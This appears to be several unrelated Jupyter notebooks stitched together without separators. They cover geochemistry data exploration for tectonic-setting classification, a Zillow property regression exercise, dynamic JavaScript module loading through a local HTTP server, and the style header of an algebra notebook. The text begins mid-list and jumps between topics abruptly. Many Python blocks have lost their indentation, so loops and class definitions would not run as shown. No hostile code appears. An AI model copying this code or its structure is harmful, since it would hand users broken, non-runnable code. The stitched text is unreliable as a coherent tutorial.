- [matplotlib](https://matplotlib.org/) for basic plotting (but allows control of many details where needed)
- [pandas](https://pandas.pydata.org) for data handling (our dataframe library)
- [seaborn](https://seaborn.pydata.org) for _nice_ data visualization
- [scipy](https://scipy.org) for scientific libraries (particularly `scipy.stats` which we'll use for fitting some more unusual probability distributions), and
- [statsmodels](https://www.statsmodels.org/stable/index.html) which gives us some more expressive curve fitting approaches, should you wish to use them
## Import Your Dataset
This specific example is a dataset from my own research - it's an early version of a dataset I've put together to see whether we can effectively tell in which setting a rock formed based on its chemistry (tectonic setting classification/discrimination).
```
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from pathlib import Path
```
I've added the dataset to Onedrive for this exercise - here we download it directly from there into memory:
```
from fetch import get_onedrive_directlink
# here I've added a direct link to a compressed dataset stored in Onedrive
df = pd.read_csv(get_onedrive_directlink('https://1drv.ms/u/s!As2ibEui13xmlv567184QOhGfNmQDQ?e=l1ghpZ'), compression='zip')
df.drop(columns=df.columns[0], inplace=True) # an index snuck in here - we don't need it
df.head()
df.info()
```
---
## Why was this dataset collected/recorded?
* What would you like to do with it? Is it amenable to that use case?
* Does it have obvious limitations or restrictions to how it might be used?
* Is the data limited in relevance to a particular time period, area or site?
---
<em>
* This dataset was aggregated for the purpose of building a model to classify the setting in which different igneous rocks formed based on their geochemistry.
* The tectonic settings are assigned based on geographical location - it is more complicated in some tectonic scenarios or where there might be overlap through space or in geological time.
* These rocks are all relatively recent (up to a few hundred million years old at most), and whether these samples are useful for classifying older rocks is uncertain.
* Whether these tectonic settings existed at all as you go further back in time is actually contentious - so the classification problem isn't well formed under these scenarios.
* This dataset isn't likely to be directly useful for investigating sedimentary rocks (although in some cases it could provide some relevant information), and may or may not be useful for looking at metamorphosed rocks
* Most of the samples are from land!
</em>
---
## Why might I be interested?
* What else might this be useful for?
* Could this be linked or integrated with another dataset?
* Could your solution to the problem be re-used in another area of the business?
---
<em>
* This relatively diverse dataset could be used for a variety of classification and regression problems
* It would also be a handy reference for where you may want background values to provide geological context, or a basis for imputing 'missing' geochemical values for igneous rocks
* The geochemical variables in this dataset should be directly comparable to most other lithogeochemical datasets - and hence could be easily integrated. Some of the isotope ratios may need to be converted to different units or forms; some of the locations may also need to be converted.
* Only some of the samples have accurate positioning, and few have a 'depth' parameter (most are likely surface or near-surface samples rather than drilled).
* The classification workflow developed for this problem can readily be adapted to many other geochemical and mineralogical classification problems.
</em>
---
## How big a dataset are we talking?
This one is relatively straightforward, but provides some first-order constraints on what we may be able to do with it, and how you might want to work with your data:
* Number of records
* Number of variables
* Size on disk
---
```
df.index.size
df.columns.size
df.info(memory_usage="deep")
```
---
* Are there multiple groups of records within your dataset (e.g. multiple sites, machines, instances or time periods)?
* Is your target variable likely to be dependent on these groupings/is this key grouping your target variable (i.e. a classification problem)?
* Are there similar numbers of records for each of these groups, or is it a bit imbalanced?
---
*My target variable is the principal grouping, which I've encoded as eight categories:*
* Back arc basins (BAB)
* Continental arcs (CA)
* Continental flood basalts (CF)
* Island arcs (IA)
* Intra-oceanic arcs (IOA)
* Mid-Ocean Ridge basalts (MOR)
* Ocean Island basalts (OI)
* Oceanic plateaus (OP)
```
df.Srcidx.unique()
```
*This is a reasonably imbalanced dataset!*
```
df.Srcidx.value_counts()
```
---
* Is the dataset in a tidy format? How might you need to rearrange it if not?
1. Each variable you measure should be in one column.
2. Each different observation of that variable should be in a different row.
<!-- <div class='alert alert-success'> -->
<b>Note:</b> the last two tidy data points about separate tables are excluded here; for most ML applications you'll need a single fully-integrated table. Depending on your dataset, it may make sense to keep individual tables separate until after data processing, however.
<!-- </div> -->
---
*This dataset is already quite tidy for a single-table dataset (although this took some munging...!) - see the generic reshaping sketch below for the kind of rearrangement un-tidy data often needs.*
---
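For reference, this is the sort of reshaping that un-tidy, 'wide' data often needs. It is only a generic sketch with a made-up two-row table (not part of this dataset), using pandas' `melt`:
```
# Generic example only: reshape a wide table (one column per element) into tidy long format
wide = pd.DataFrame({'sample': ['s1', 's2'], 'Cr': [310.0, 120.0], 'Th': [1.2, 4.5]})
tidy = wide.melt(id_vars='sample', var_name='element', value_name='concentration')
print(tidy)
```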
* If your records relate to individual measurements or samples, are they regularly spaced (in time and/or space)? What's the frequency of the records?
---
*These samples are unevenly distributed across the globe; some parts of the world might not have much data (although not all samples have point locations!):*
```
ax = df.plot.scatter('Longitude', 'Latitude', color='g')
ax.scatter(df[['Longitudemin', 'Longitudemax']].mean(axis=1), df[['Latitudemin', 'Latitudemax']].mean(axis=1), color='purple')
```
---
## What are the variables?
Provide an overview of the types and groupings of variables, where relevant:
* What are the variable names? Should you rename these for clarity?
---
<em>
* Some of the variables have overlap (especially for metadata) - and some of the names could be updated for clarity (e.g. 'Srcidx' isn't very informative!).
* The geochemical data is labelled in a straightforward way.
* The variables L0-L3 are parameterisations of geochemistry and could be more verbosely named.
</em>
```
df.columns.tolist()#[:20]
```
---
* Which variables are your targets (what you want to predict) and which are your likely inputs (what you'll use to predict your target)?
---
<em>
* Here the target is the tectonic setting category in <b>Srcidx</b>, and most of the geochemical data variables are viable inputs.
* The metadata may not be particularly useful in this case, especially given that it's not universal across all samples.
</em>
---
* How have the variables been measured/recorded?
* Are units are important? Is the entire table in a consistent format/set of units?
---
<em>
* The geochemical data have been measured using a variety of techniques (and to some degree the individual records represent multiple analyses).
* Geochemical data recorded as elements (e.g. 'Cr') are in units of ppm; data recorded as oxides (e.g. 'Cr2O3') are in units of Wt%.
</em>
```
fig, ax = plt.subplots(1, 2, figsize=(8, 4))
bins = np.linspace(0, 1000, 100)
df['Cr'].plot.hist(bins=bins, ax=ax[0])
df['Cr2O3'].plot.hist(bins=bins/10000, ax=ax[1]) # 1 wt% = 10,000 ppm, so dividing the ppm bins by 10,000 puts this on a comparable scale
ax[0].set(xlabel='Cr (ppm)')
ax[1].set(xlabel='Cr2O3 (Wt%)')
plt.tight_layout()
```
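For reference, converting between the two representations combines the wt% to ppm factor (1 wt% = 10,000 ppm) with the mass fraction of the element in its oxide. Below is a minimal sketch for Cr2O3 to Cr; the atomic masses are approximate values hard-coded here rather than taken from a reference library:
```
# Convert Cr2O3 (wt%) into an equivalent Cr content (ppm) so it can be compared with the Cr column
M_Cr, M_O = 51.996, 15.999                             # approximate atomic masses
cr_fraction = 2 * M_Cr / (2 * M_Cr + 3 * M_O)          # mass fraction of Cr in Cr2O3 (~0.684)
cr_ppm_from_oxide = df['Cr2O3'] * 10000 * cr_fraction  # wt% -> ppm, then oxide -> element
both = df[['Cr']].assign(Cr_from_Cr2O3=cr_ppm_from_oxide).dropna()
print(both.describe())  # rough consistency check where both columns are reported
```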
---
* Are variables in the right formats?
* Have some numerical variables been converted to strings/objects?
* Are dates recorded in a convenient format?
* Do you have [categorical](https://pandas.pydata.org/pandas-docs/stable/user_guide/categorical.html) variables which you could appropriately encode?
---
*Data are largely in the correct formats - although geological ages are not converted to dates here.*
```
df.dtypes.head()
```
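As a small illustration of the categorical point above (the target column Srcidx is the obvious candidate), pandas' categorical dtype makes the encoding explicit; this sketch leaves the original dataframe untouched:
```
# Make the target an explicit categorical; .cat.codes provides stable integer labels if needed
srcidx_cat = df['Srcidx'].astype('category')
print(srcidx_cat.cat.categories)
print(srcidx_cat.cat.codes.head())
```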
---
* Are some data missing?
    * Are they randomly or systematically missing?
    * Is there a correlation between 'missingness' across variables?
    * How is missing data recorded? Is there more than one form of missing data, and if so do you want to retain that information (e.g. 'below detection', 'not measured')?
* What are your options for [dealing with the missing data](https://pandas.pydata.org/pandas-docs/stable/user_guide/missing_data.html)? Do you need to drop these rows, or can you fill the values/impute the values?
---
<em>
* We have a number of columns which are missing most of the data
* In some cases data seem to be missing at random - but as we have compositional data it's partially missing due to being below a threshold for detection
* In many cases elements were simply not measured - which is partially due to methods, and partly due to choices for different rocks, so is not independent of our target variable!
* Missing data is here replaced with np.nan
* We could impute some missing data, but given the nature of the data it may be better to select a low-missingness subset of features...
</em>
```
percentage_missing = (df.isnull().sum(axis=0) / df.index.size * 100)  # percentage of rows missing per column
percentage_missing.to_frame().head(20).style.background_gradient(cmap='viridis_r')
```
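To act on that last point, a low-missingness subset could be selected along these lines (a sketch only - the 25% threshold is an arbitrary choice for illustration):
```
# Keep only columns where less than ~25% of rows are missing (threshold is illustrative)
missing_fraction = df.isnull().mean()
low_missing_cols = missing_fraction[missing_fraction < 0.25].index
df_subset = df[low_missing_cols]
print(df.shape, '->', df_subset.shape)
```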
---
* How are the variables distributed?
* Are they approximately normally distributed?
* Will you need to transform these before using them in a machine learning pipeline?
    * What are appropriate values for your target variable (i.e. continuous real values, continuous positive values, boolean, categories)?
---
<em>
* Geochemical data are not expected to be normally distributed - instead they're likely to be approximately log-normally distributed (or, more specifically, ratios of geochemical variables are expected to be)
* As such some transformation will likely be needed.
* In this case the target variable is categorical, so is well bounded - we don't need to worry about continuous values here!
* We might have some precision issues (e.g. see Cr2O3)
* We will have some 'below detection' truncation
* Data for the same element will be distributed differently if it's recorded as an oxide or element (e.g. Cr vs Cr2O3; partly due to methods and relative detection limits)
</em>
```
ax = df.Cr2O3.plot.hist(bins=bins/10000)
ax.vlines(np.arange(0, 0.11, 0.01), ymin=190, ymax=200, color='k') # add some lines to illustrate where precision might be interfering
fig, ax = plt.subplots(1, 2, sharey=True)
df.Cr.plot.hist(bins=bins, color='0.5', ax=ax[0])
logbins = np.linspace(np.log(bins[1]), np.log(bins[-1]), 100)
df.Cr.apply(np.log).plot.hist(bins=logbins, color='0.5', ax=ax[1]) # compare log-scaled data over the same range
ax = df['Th'].plot.hist(bins=bins/100)
ax.vlines(np.arange(0, 10, 1), ymin=1400, ymax=1500, color='k') # add some lines to illustrate where precision might be interfering
fig, ax = plt.subplots(1, 2, figsize=(10, 4))
df['Ti'].plot.hist(bins=100, ax=ax[0])
df['TiO2'].plot.hist(bins=np.linspace(0, 6, 100), ax=ax[1])
ax[0].set(xlabel='Ti (ppm)')
ax[1].set(xlabel='TiO2 (wt%)')
plt.tight_layout()
```
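A minimal sketch of the kind of transformation implied above - a simple log-transform of a couple of the positive, right-skewed columns shown here (the column choice is illustrative, and non-positive values are simply masked rather than handled properly):
```
# Log-transform a few right-skewed trace-element columns before any modelling (illustrative only)
trace_cols = ['Cr', 'Th']
logged = np.log(df[trace_cols].where(df[trace_cols] > 0))  # mask non-positive values before logging
print(logged.describe())
```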
---
* What do the correlations of variables look like? Are there 'blocks' or groups of variables which are correlated with one another, or is each providing different information?
---
<em>
* There are some strong correlations and 'blocks' within the dataset - one of these is the Rare Earth Elements!
* There is some variety in the structure - different elements seem to be providing independent information.
* Some parameters are either perfectly or nearly-perfectly correlated (e.g. ratios and normalised ratios, location min-max pairs)
</em>
```
corr = df.corr()
f, ax = plt.subplots(figsize=(14, 14))
sns.heatmap(corr, square=True, linewidths=0.01, cbar_kws={"shrink": .8}, cmap='viridis')
```
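To back up the 'nearly perfectly correlated' point with numbers, here is a small sketch that lists variable pairs above an arbitrary threshold, reusing the corr matrix computed above:
```
# List strongly correlated variable pairs (the 0.95 threshold is arbitrary/illustrative)
upper = np.triu(np.ones(corr.shape, dtype=bool), k=1)  # upper triangle, excluding the diagonal
pairs = corr.abs().where(upper).stack()
print(pairs[pairs > 0.95].sort_values(ascending=False).head(15))
```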
---
* Are there outliers?
* Are they related to incorrect data, rare events or potential data entry issues?
* Are they likely to have a negative impact on your model, or are they an inherent feature of the dataset?
* If you're to remove them, what's a good way of selecting them?
---
*Perhaps - but distinguishing 'outliers' from strange rocks might not be something I can confidently do based on the data alone (and a single sample of each rock..). For this reason I'll leave them in for the time being - unless I can establish clear data-driven reasons for their exclusion.*
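If a data-driven screen were wanted later, a robust z-score flag would be one possible starting point. This is only a sketch - the column and threshold are illustrative, and nothing is actually removed:
```
# Flag (rather than drop) potential outliers in one column using a median/MAD-based robust z-score
x = df['Cr'].dropna()
mad = (x - x.median()).abs().median()
robust_z = (x - x.median()) / (1.4826 * mad)  # 1.4826 scales the MAD to be comparable with a standard deviation
print((robust_z.abs() > 5).sum(), 'of', x.size, 'Cr values flagged at |z| > 5')
```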
---
## Visualising Key Relationships
* What are some key relationships within your dataset?
---
*A key visualisation which is used for the graphical equivalent of this task is the 'Pearce plot' - a plot of Th/Yb over Nb/Yb (illustrating reasonable separation for just two/three dimensions..):*
```
fig, ax = plt.subplots(1, figsize=(8, 6))
variables = ['Nb/Yb', 'Th/Yb']
ax.set(yscale='log', xscale='log', xlabel=variables[0], ylabel=variables[1])
for setting, subdf in df.groupby('Srcidx'):
ax.scatter(*subdf[variables].T.values, label=setting, alpha=0.8/np.log(subdf.index.size))
# add a legend and alter the opacity so we can see what's what
leg = ax.legend(frameon=False, facecolor=None, bbox_to_anchor=(1,1))
for lh in leg.legendHandles:
lh.set_alpha(1)
```
---
* How might you investigate this dataset further?
---
---
* Do you expect any major hurdles for getting this dataset analysis ready? Are there any key decisions you need to make about pre-processing?
---
<em>
* Dealing with missing data
* Identifying subtle errors in data entry/units
* Dealing with imprecision issues
* Identifying poor quality analyses
* Spatial coverage, biases and validity
* & more...
</em>
---
## Optional: Find another dataset that we could fuse with this one.
* Are there other datasets which might provide some additional context to solve your problem (e.g. bringing in data from logs, weather data, imagery)?
---
---
* Could your dataset be integrated with data from further along the processing chain/another part of the business to solve problems there?
---
### Part 1
I will find the correlation between the following properties:
- Bedroom Count
- Building Quality Type
- Calculated Finished Square Feet
- Number of Stories
- Lot size
- Tax Amount
We will make use of **Pandas, Numpy, Matplotlib and Seaborn** libraries in Python. The first step is to import all the necessary libraries.
```
import pandas as pd
import numpy as np
import seaborn as sns  # seaborn.apionly was deprecated and later removed; the plain import works for the heatmap below
import matplotlib.pyplot as plt
from sklearn import linear_model, preprocessing
from sklearn.metrics import mean_squared_error, r2_score
from sklearn.svm import SVR
from scipy import stats
```
The next step is to read the data file given in the form of a **.csv** file.
```
data = pd.read_csv('data/properties_2016.csv', usecols=['parcelid',
'bedroomcnt',
'buildingqualitytypeid',
'calculatedfinishedsquarefeet',
'numberofstories',
'lotsizesquarefeet',
'taxamount',
], index_col='parcelid')
```
Now we should include the logerror values in our **Pandas** *dataframe* so that we can find the correlation between the log error and other features.
```
logerror_data = pd.read_csv('data/train_2016_v2.csv', usecols=['parcelid','logerror'], index_col='parcelid')
```
Let's join the **logerror_data** with other features in the dataframe **data**. **Outer join** is used so that the new data frame contains the **union** of the **parcelid** in the two data frames.
```
data = data.join(logerror_data, how='outer')
```
I'm renaming the column names in the data frame for easy representation in the correlation matrix.
```
data_renamed = data.rename(index=str, columns={'bedroomcnt':'BedCnt',
'buildingqualitytypeid':'BldnQlty',
'calculatedfinishedsquarefeet':'sqFeet',
'numberofstories':'Stories',
'lotsizesquarefeet':'lotsize',
'taxamount':'tax'})
```
Compute the correlation matrix for **data**.
```
corr = data_renamed.corr()
```
For easy interpretation, I've presented the heatmap of the correlation matrix (given below) with the feature names and correlation values on it. The code below does all the work to convert a heatmap to our specified format. Source: https://stackoverflow.com/questions/43507756/python-seaborn-how-to-replicate-corrplot
```
mask = np.zeros_like(corr, dtype=bool) # returns a boolean array of zeros of the same shape and size as corr mat (np.bool was removed in newer NumPy)
mask[np.triu_indices_from(mask)] = True # makes the upper triangle of mask as 1
# Set up the matplotlib figure
fig, ax = plt.subplots()
# Draw the heatmap with the mask and correct aspect ratio
vmax = np.abs(corr.values[~mask]).max()
sns.heatmap(corr, mask=mask, cmap=plt.cm.PuOr, vmin=-vmax, vmax=vmax,
square=True, linecolor="lightgray", linewidths=1, ax=ax) # Masks the upper triangle of the heatmap
for i in range(len(corr)):
ax.text(i+0.5,len(corr)-(i+0.5), corr.columns[i],
ha="center", va="center", rotation=45)
for j in range(i+1, len(corr)):
s = "{:.3f}".format(corr.values[i,j])
ax.text(j+0.5,len(corr)-(i+0.5),s,
ha="center", va="center")
ax.axis("off")
plt.show()
```
Some important observation from the above correlation matrix are:
- **Tax Amount and Total Square feet of the building** are highly correlated with the value 0.539.
- **Building Quality** is negatively correlated to all other features taken into account, which is interesting.
- Particularly, **building quality being negatively correlated to the Tax amount** is surprising.
- **Number of stories** in a building are positively correlated with both **Total Square feet** of the building and **Tax amount**.
- **Bedroom Count** is highly correlated with the **Total square feet** of the building which is understandable.
- **Log Error** is not heavily correlated with any of the features, with maximum being with **Square Feet**.
### Part 2
In this part, we have to present some information in this data in the form of plots. For this, first we need to **reset the index** of the data-frame from **parcelid** to a simple increasing sequence of numbers. Doing this will make the plot easier to analyze.
```
data_without_index = data_renamed.reset_index()
```
Now we are ready to see the scatter plot of **Total Square Feet of the buildings** with the following code segment. Note that we're removing the **NaN** values from the data before plotting. We also drop implausibly small values (100 sq. ft. or less).
```
sqFeet = data_without_index['sqFeet'][np.logical_not(np.isnan(data_without_index['sqFeet']))]
sqFeet = sqFeet[sqFeet > 100]
plt.plot(sqFeet,'o', ms=1) #ms is an alias for marker size
plt.xlabel('Houses')
plt.ylabel('Total square feet')
plt.show()
```
As is clear, the above figure doesn't show much information about the distribution because of the large size of the data and the outliers. So let's plot the figure again, **removing outliers** and limiting the view to the first **500** houses.
```
plt.plot(sqFeet,'o', ms=1) #ms is an alias for marker size
plt.xlabel('Houses')
plt.ylabel('Total square feet')
axes = plt.gca() # Stands for get the current axis
axes.set_ylim([0,10000])
axes.set_xlim([0,500])
plt.show()
```
Now this scatter plot is much more informative. It clearly shows that most houses are between **1000 - 3000 sq. feet**.
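One way to check that reading quantitatively is to look at the quantiles of the same cleaned series (a small sketch):
```
print(sqFeet.quantile([0.25, 0.5, 0.75]))            # the middle 50% of houses
print(((sqFeet >= 1000) & (sqFeet <= 3000)).mean())  # fraction of houses between 1000 and 3000 sq. ft.
```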
Now in the second plot, we will try to find out how many houses are from each county. For this, we'll use the Pie Chart.
```
county_arch = pd.read_csv('data/properties_2016.csv', usecols=['regionidcounty','architecturalstyletypeid'])
county_arch['regionidcounty'] = county_arch['regionidcounty'].replace([3101.0, 2061.0, 1286.0],
['Los Angeles', 'Orange', 'Ventura'])
county_arch['regionidcounty'].value_counts(normalize=False, sort=True, dropna=True).plot(kind='pie',autopct='%.2f')
plt.axis('equal')
plt.show()
county_arch_temp = county_arch['architecturalstyletypeid'].value_counts(normalize=False, sort=True, dropna=True)
county_arch_small_values_clubbed = county_arch_temp.head(4)
county_arch_temp = county_arch_temp.reset_index(drop=True)
if len(county_arch_temp) > 4:
county_arch_small_values_clubbed['Others'] = county_arch_temp[4:].sum()
county_arch_small_values_clubbed.plot(kind='pie',autopct='%.2f')
plt.legend()
plt.axis('equal')
plt.show()
```
Next we try to plot a line chart of Tax amount against Total area.
```
area_tax = pd.concat([data_without_index['sqFeet'], data_without_index['tax']], axis=1, keys=['sqFeet', 'tax'])
area_tax['tax'] = area_tax['tax']/1000000
area_tax['sqFeet'] = area_tax[area_tax['sqFeet'] < 17000]['sqFeet']
area_tax = area_tax.dropna(axis=0, how='any')
y,binEdges=np.histogram(area_tax['sqFeet'], weights=area_tax['tax'],bins=100)
bincenters = 0.5*(binEdges[1:]+binEdges[:-1])
plt.plot(bincenters,y,'-')
plt.xlabel('Total Square Feet')
plt.ylabel('Tax Amount/1000000')
plt.title('Line Chart for the distribution of Tax Amount vs. Total Square Feet', loc='right')
plt.show()
```
Next we plot the histogram for the distribution of logerror vs. Square Feet
```
area_error = pd.concat([data_without_index['sqFeet'], data_without_index['logerror']], axis=1, keys=['sqFeet', 'logerror'])
area_error['sqFeet'] = area_error[area_error['sqFeet'] < 17000]['sqFeet']
area_error = area_error.dropna(axis=0, how='any')
plt.hist(area_error['sqFeet'], weights=area_error['logerror'])
plt.show()
```
### Part 3
```
reg_area_error = pd.concat([data_without_index['sqFeet'], data_without_index['logerror']], axis=1, keys=['sqFeet', 'logerror'])
reg_area_error['sqFeet'] = reg_area_error[reg_area_error['sqFeet'] < 17000]['sqFeet']
reg_area_error = reg_area_error.dropna(axis=0, how='any')
result = np.polyfit(np.log2(reg_area_error['sqFeet']), reg_area_error['logerror'], 1)  # fit in log2 space so the fitted line matches the log2 x-axis used below
print(result)
plt.plot(np.log2(reg_area_error['sqFeet']), reg_area_error['logerror'], 'o', ms=1)
plt.plot(np.log2(reg_area_error['sqFeet']), np.polyval(result, np.log2(reg_area_error['sqFeet'])), 'r-')
plt.show()
```
Now let's try linear regression on all factors. We will start by adding more features to the **data**.
```
more_features = pd.read_csv('data/properties_2016.csv', usecols=['parcelid',
'basementsqft',
'bathroomcnt',
'fireplacecnt',
'garagecarcnt',
'garagetotalsqft',
'poolcnt',
'poolsizesum',
'yearbuilt'
], index_col='parcelid')
```
Join the **more_features** dataframe to the **data**.
```
data = data.join(more_features, how='outer')
```
Now let's see how many values we have after dropping the rows that contain any **Nan** values.
```
data_dropped_nan = data.dropna(axis=0, how='any')
print(data_dropped_nan)
```
As is clear from the result, we don't have any rows in our data where all of the above values exist at the same time. So, to perform linear regression on this data, we'll replace the **NaN** values with the column **mean** for every field except **logerror**, and take a portion of the dataset to analyze.
```
data_without_nan = data.drop('logerror',1).fillna(data.mean())
data_without_nan = data_without_nan.join(logerror_data, how='outer')
data_without_nan = data_without_nan.dropna(axis=0, how='any')
data_without_nan_noindex = data_without_nan.reset_index()
data_without_nan_noindex = data_without_nan_noindex.drop('parcelid',1)
data_without_logerror = data_without_nan_noindex.drop('logerror',1)
logerror = data_without_nan_noindex['logerror']
train_x = data_without_logerror.iloc[:45000,:]
test_x = data_without_logerror.iloc[45000:,:]
train_y = logerror.iloc[:45000]
test_y = logerror.iloc[45000:]
regr = linear_model.LinearRegression()
regr.fit(train_x, train_y)
print(regr.coef_)
```
Now lets test the regression model and analyze the results.
```
predict_y = regr.predict(test_x)
print(mean_squared_error(test_y, predict_y))
print(r2_score(test_y, predict_y))
```
### Part 4
Reducing the number of parameters in linear regression: we will drop columns with too many NaN values and keep only the columns with a limited number of NaNs. No extra replacement for the NaN values is required.
```
data_dropped_nans = data
for col in data_dropped_nans:
if data_dropped_nans[col].isnull().sum() > 300000:
data_dropped_nans = data_dropped_nans.drop(col,1)
data_dropped_nans = data_dropped_nans.join(logerror_data, how='outer')
data_dropped_nans = data_dropped_nans.dropna(axis=0, how='any')
data_dropped_nans_noindex = data_dropped_nans.reset_index()
data_dropped_nans_noindex = data_dropped_nans_noindex.drop('parcelid',1)
data_dropped_nans_error = data_dropped_nans_noindex.drop('logerror',1)
logerror = data_dropped_nans_noindex['logerror']
train_x = data_dropped_nans_error.iloc[:45000,:]
test_x = data_dropped_nans_error.iloc[45000:,:]
train_y = logerror.iloc[:45000]
test_y = logerror.iloc[45000:]
regr = linear_model.LinearRegression()
regr.fit(train_x, train_y)
print(regr.coef_)
predict_y = regr.predict(test_x)
print(mean_squared_error(test_y, predict_y))
print(r2_score(test_y, predict_y))
```
Wow !!! A great improvement in results.
```
plt.plot(test_y-predict_y,'ro', ms=1)
plt.show()
```
Scatter plot of the residuals
Now let's try to use SVR (Support Vector Regression) on our above data and see if it improves the result. We will remove the outliers and normalize all the fields for this operation.
```
final_data_noerror = data_dropped_nans.drop('logerror',1)
# Removing the outliers with distance farther than 3*std-dev from mean
final_data_noerror_no_outlier = final_data_noerror[(np.abs(stats.zscore(final_data_noerror)) < 3).all(axis=1)]
# print final_data_noerror_no_outlier
final_data_no_outlier = final_data_noerror_no_outlier.join(logerror_data, how='outer')
final_data_no_outlier = final_data_no_outlier.dropna(axis=0, how='any')
final_data_no_outlier_noindex = final_data_no_outlier.reset_index()
final_data_no_outlier_noindex = final_data_no_outlier_noindex.drop('parcelid',1)
```
Now we'll normalize the data in the cells
```
min_max_scalar = preprocessing.MinMaxScaler()
np_scaled = min_max_scalar.fit_transform(final_data_no_outlier_noindex)
final_data_normalized = pd.DataFrame(np_scaled)
```
Now that we've removed the outliers and normalized the data, let's apply SVR on this model.
```
final_data_svr = final_data_normalized.drop(6,1)
logerror = final_data_normalized[6]
train_x = final_data_svr.iloc[:45000,:]
test_x = final_data_svr.iloc[45000:,:]
train_y = logerror.iloc[:45000]
test_y = logerror.iloc[45000:]
clf = SVR(C=1.0, epsilon=0.2)
clf.fit(train_x, train_y)
predict_y = clf.predict(test_x)
print(mean_squared_error(test_y, predict_y))
print(r2_score(test_y, predict_y))
```
Let's perform Linear Regression for the same data
```
regr = linear_model.LinearRegression()
regr.fit(train_x, train_y)
print(regr.coef_)
predict_y = regr.predict(test_x)
print(mean_squared_error(test_y, predict_y))
print(r2_score(test_y, predict_y))
```
Linear Regression does pretty well on this filtered data.
# Loading Javascript modules
## Run it!
* make sure jupyter server proxy is installed
* copy httpserver.py and LoadingJavascriptModules.ipynb in the same directory of a Jupyter Lab server
* create a widgets subdirectory there and copy: main.js and the module subdirectory
* Run the notebook (Kernel -> Restart Kernel And Run All Cells...)
| | |
| --- | --- |
| **You should get this right hand picture** |  |
## What does it do?
* The normal behavior of a Jupyter Lab notebook is to have all frontend components pre-loaded
* Sometimes, for example during experimentation, loading frontend components on demand is necessary
* This notebook presents a way to load javascript modules dynamically
## Libraries
```
from httpserver import start, stop
from http.server import SimpleHTTPRequestHandler, HTTPServer
import os
from urllib.parse import urlparse, parse_qs
import ipywidgets as widgets
import time
```
## Backend: the HTTP server
### Widgets python implementation
```
logsw=widgets.Textarea(layout=widgets.Layout(width='50%'))
logsw.value = ""
bag ={}
class myHTTPRequestHandler(SimpleHTTPRequestHandler):
callback={}
def __init__(self, *args, directory=None,bag=bag, **kwargs):
self.bag = bag
self.directory = os.path.join(os.getcwd(),"widgets")
super().__init__(*args, directory=self.directory, **kwargs)
# print(self.directory)
def end_headers(self):
super().end_headers()
def do_GET(self):
self.parsed_path = urlparse(self.path)
self.queryparams = parse_qs(self.parsed_path.query)
if self.path.endswith('/version'):
self.version()
elif self.parsed_path.path.endswith('/setvalue'):
self.setvalue()
else:
super().do_GET()
def version(self):
ans = '{"version": "0.0"}'
eans = ans.encode()
self.send_response(200)
self.send_header("Content-type", "application/json")
self.send_header("Content-Length",len(eans))
self.end_headers()
self.wfile.write(eans)
def setvalue(self):
self.bag.update({self.queryparams['variable'][0]:self.queryparams['value'][0]})
if self.queryparams['variable'][0] in myHTTPRequestHandler.callback:
self.callback[self.queryparams['variable'][0]](self.queryparams['value'][0])
self.version()
def log_message(self, format, *args):
global logsw
v = format % args
t = time.localtime()
current_time = time.strftime("%H:%M:%S", t)
logsw.value += current_time + " " + v +"\n"
logsw
start(handler_class=myHTTPRequestHandler, port=8085)
```
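Once the server is running, the two custom endpoints defined above can be exercised directly. This is just a quick smoke test and assumes the `requests` package is installed and that `start()` runs the server in the background on port 8085, as the rest of the notebook implies:
```
# Quick check of the /version and /setvalue endpoints handled by myHTTPRequestHandler
import requests
print(requests.get('http://localhost:8085/version').json())
print(requests.get('http://localhost:8085/setvalue', params={'variable': 'demo', 'value': '42'}).json())
print(bag)  # the handler stores the submitted value in the shared bag dict
```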
## Frontend
### Widget javascript implementation
This is the 'basic modules' example you can find [here](https://github.com/mdn/js-examples/tree/master/modules/basic-modules).
The main.js file is slightly modified.
```
class LoadModule(object):
"""This class is loading the main.js module"""
def _repr_javascript_(self):
return '''debugger;
var id = document.getElementById("moduleMain")
if (id!=null){
if ('makeIt' in window){
// the module main.js is already loaded
fetch(window.location.origin+'/proxy/8085/setvalue?value=1&variable=loaded')
} else {
console.log("makeIt not found!!!!")
}
} else {
var script= document.createElement('script');
script.src = "/proxy/8085/main.js";
script.type = "module"
script.id = "moduleMain"
document.head.appendChild(script);
function check(){
if (!('makeIt' in window)){
setTimeout(function(){ check()}, 500);
}
}
check()
// sub modules are still not loaded (let them 2 secs)
setTimeout(fetch, 2000, window.location.origin+'/proxy/8085/setvalue?value=1&variable=loaded' )
}
'''
class ExecuteModule(object):
"""This class execute the code once the modul is loaded"""
def _repr_javascript_(self):
return '''
element = document.getElementById("myElement0");
element.innerHTML = "";
makeIt(element);
'''
class DisplayModule(object):
"""This class is creating the element where the output of the will set UI elements"""
def _repr_javascript_(self):
return '''
element.id="myElement0";
// console.log(element);
'''
DisplayModule()
def loaded_cb(value):
display(ExecuteModule())
myHTTPRequestHandler.callback.update({"loaded": loaded_cb})
LoadModule()
#stop()
```
```
%%html
<link href="http://mathbook.pugetsound.edu/beta/mathbook-content.css" rel="stylesheet" type="text/css" />
<link href="https://aimath.org/mathbook/mathbook-add-on.css" rel="stylesheet" type="text/css" />
<style>.subtitle {font-size:medium; display:block}</style>
<link href="https://fonts.googleapis.com/css?family=Open+Sans:400,400italic,600,600italic" rel="stylesheet" type="text/css" />
<link href="https://fonts.googleapis.com/css?family=Inconsolata:400,700&subset=latin,latin-ext" rel="stylesheet" type="text/css" /><!-- Hide this cell. -->
<script>
var cell = $(".container .cell").eq(0), ia = cell.find(".input_area")
if (cell.find(".toggle-button").length == 0) {
ia.after(
$('<button class="toggle-button">Toggle hidden code</button>').click(
function (){ ia.toggle() }
)
)
ia.hide()
}
</script>
```
**Important:** to view this notebook properly you will need to execute the cell above, which assumes you have an Internet connection. It should already be selected, or place your cursor anywhere above to select. Then press the "Run" button in the menu bar above (the right-pointing arrowhead), or press Shift-Enter on your keyboard.
$\newcommand{\identity}{\mathrm{id}}
\newcommand{\notdivide}{\nmid}
\newcommand{\notsubset}{\not\subset}
\newcommand{\lcm}{\operatorname{lcm}}
\newcommand{\gf}{\operatorname{GF}}
\newcommand{\inn}{\operatorname{Inn}}
\newcommand{\aut}{\operatorname{Aut}}
\newcommand{\Hom}{\operatorname{Hom}}
\newcommand{\cis}{\operatorname{cis}}
\newcommand{\chr}{\operatorname{char}}
\newcommand{\Null}{\operatorname{Null}}
\newcommand{\lt}{<}
\newcommand{\gt}{>}
\newcommand{\amp}{&}
$
